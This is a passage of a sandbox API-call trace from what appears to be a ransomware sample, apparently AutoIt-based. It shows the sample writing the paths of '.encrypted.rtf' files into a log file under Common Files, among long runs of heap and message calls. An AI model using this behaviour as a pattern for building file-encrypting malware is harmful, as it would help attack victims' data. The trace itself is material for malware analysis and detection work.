wRemoveMsg=0x1 | out: lpMsg=0x6aed6c) returned 0 [0033.763] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1648 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af368 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4b8 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x18) returned 0x7ae948 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af378 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.763] CharUpperBuffW (in: lpsz="_GETFILENAMEEXEXT", cchLength=0x11 | out: lpsz="_GETFILENAMEEXEXT") returned 0x11 [0033.763] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b16e8 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3e8 [0033.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="f", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="tf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 3 [0033.763] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1=".rtf", cchCount1=1, lpString2=".", cchCount2=1) returned 2 [0033.763] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.763] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5e8 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.764] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1710 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.764] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1850 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5c8 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.764] PeekMessageW (in: lpMsg=0x6aeb94, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aeb94) returned 0 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af4f8 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.764] CreateFileW (lpFileName="C:\\PROGRA~2\\COMMON~1\\log.txt" (normalized: "c:\\progra~2\\common~1\\log.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x4, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x128 [0033.764] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.764] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee24 | out: lpNewFilePointer=0x0) returned 1 [0033.764] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.764] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af4b8 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10000) returned 0x945010 [0033.764] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.764] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee14 | out: lpNewFilePointer=0x0) returned 1 [0033.765] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x11d6, lpOverlapped=0x0) returned 1 [0033.765] ReadFile (in: hFile=0x128, lpBuffer=0x935008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x935008*, lpNumberOfBytesRead=0x6aee3c*=0x0, lpOverlapped=0x0) returned 1 [0033.765] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x11d6, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0033.765] SetFilePointerEx (in: hFile=0x128, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x6aee04 | out: lpNewFilePointer=0x0) returned 1 [0033.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x945010 | out: hHeap=0x770000) returned 1 [0033.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5e8 [0033.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.encrypted.rtf\r\n", cchWideChar=104, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 104 [0033.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x68) returned 0x7c10a8 [0033.765] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.encrypted.rtf\r\n", cchWideChar=104, lpMultiByteStr=0x7c10a8, cbMultiByte=104, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\LkOIQE-AmAiAINSrD\\007meSo66\\JhnEQt\\pCRLZ1TsEuAv.encrypted.rtf\r\n", lpUsedDefaultChar=0x0) returned 104 [0033.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c760 | out: hHeap=0x770000) returned 1 [0033.765] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x70) returned 0x7db378 [0033.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c10a8 | out: hHeap=0x770000) returned 1 [0033.765] WriteFile (in: hFile=0x128, lpBuffer=0x7db378*, nNumberOfBytesToWrite=0x67, lpNumberOfBytesWritten=0x6aee3c, lpOverlapped=0x0 | out: lpBuffer=0x7db378*, lpNumberOfBytesWritten=0x6aee3c*=0x67, lpOverlapped=0x0) returned 1 [0033.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7db378 | out: hHeap=0x770000) returned 1 [0033.765] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5e8 | out: hHeap=0x770000) returned 1 [0033.765] CloseHandle (hObject=0x128) returned 1 [0033.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af368 | out: hHeap=0x770000) returned 1 [0033.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x935008 | out: hHeap=0x770000) returned 1 [0033.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2240 | out: hHeap=0x770000) returned 1 [0033.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af378 | out: hHeap=0x770000) returned 1 [0033.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c838 | out: hHeap=0x770000) returned 1 [0033.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c50e0 | out: hHeap=0x770000) returned 1 [0033.766] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5c8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889988 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8896a0 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1648 | out: hHeap=0x770000) returned 1 [0033.767] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c20c0 | out: hHeap=0x770000) returned 1 [0033.767] PeekMessageW (in: lpMsg=0x6aefc4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aefc4) returned 0 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab2f0 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c8f8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0ce8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af598 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14b8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c5448 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af568 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c790 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cb38 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889670 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af4c8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1378 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x8899b8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1328 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13f0 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889a78 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88caf0 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b12b0 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b13c8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889aa8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ce20 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889220 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc40 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cc88 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889af0 | out: hHeap=0x770000) returned 1 [0033.767] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1300 | out: hHeap=0x770000) returned 1 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88ceb0 | out: hHeap=0x770000) returned 1 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af438 | out: hHeap=0x770000) returned 1 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1508 | out: hHeap=0x770000) returned 1 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88cd60 | out: hHeap=0x770000) returned 1 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x889928 | out: hHeap=0x770000) returned 1 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.768] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7c2080 | out: hHeap=0x770000) returned 1 [0033.768] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.768] PeekMessageW (in: lpMsg=0x6af21c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6af21c) returned 0 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af438 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af5b8 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.768] CharUpperBuffW (in: lpsz="_FILEINUSE", cchLength=0xa | out: lpsz="_FILEINUSE") returned 0xa [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b1440 | out: hHeap=0x770000) returned 1 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5b8 | out: hHeap=0x770000) returned 1 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1440 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x1) returned 0x7af5b8 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1508 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889928 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af3f8 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af5a8 | out: hHeap=0x770000) returned 1 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd60 [0033.768] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af3f8 | out: hHeap=0x770000) returned 1 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0xc) returned 0x88ceb0 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b1300 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889af0 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af3f8 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc88 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cc40 [0033.768] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab2f0 [0033.768] PeekMessageW (in: lpMsg=0x6aedfc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x6aedfc) returned 0 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af5a8 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b14e0 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889220 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88ce20 [0033.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889aa8 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88caf0 [0033.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889a78 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8899b8 [0033.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889670 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb38 [0033.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c790 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8f8 [0033.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x8896a0 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889988 [0033.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c838 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x20) returned 0x7b0c70 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.769] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.769] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af338 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af338 | out: hHeap=0x770000) returned 1 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c928 | out: hHeap=0x770000) returned 1 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x88c868 | out: hHeap=0x770000) returned 1 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b0c70 | out: hHeap=0x770000) returned 1 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c868 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c928 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x40) returned 0x7ab260 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7b14e0 | out: hHeap=0x770000) returned 1 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c760 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cd78 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c7a8 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889dd8 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889688 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889610 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c748 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9a0 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cb20 [0033.770] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.770] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cee0 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c730 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c8c8 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x80) returned 0x7d5b30 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7ab260 | out: hHeap=0x770000) returned 1 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88cef8 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x8) returned 0x7af7c8 [0033.771] HeapFree (in: hHeap=0x770000, dwFlags=0x0, lpMem=0x7af7c8 | out: hHeap=0x770000) returned 1 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af7c8 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x889550 [0033.771] CharLowerBuffW (in: lpsz="hwnd", cchLength=0x4 | out: lpsz="hwnd") returned 0x4 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x10) returned 0x88c9d0 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 0x7af338 [0033.771] RtlAllocateHeap (HeapHandle=0x770000, Flags=0x0, Size=0x4) returned 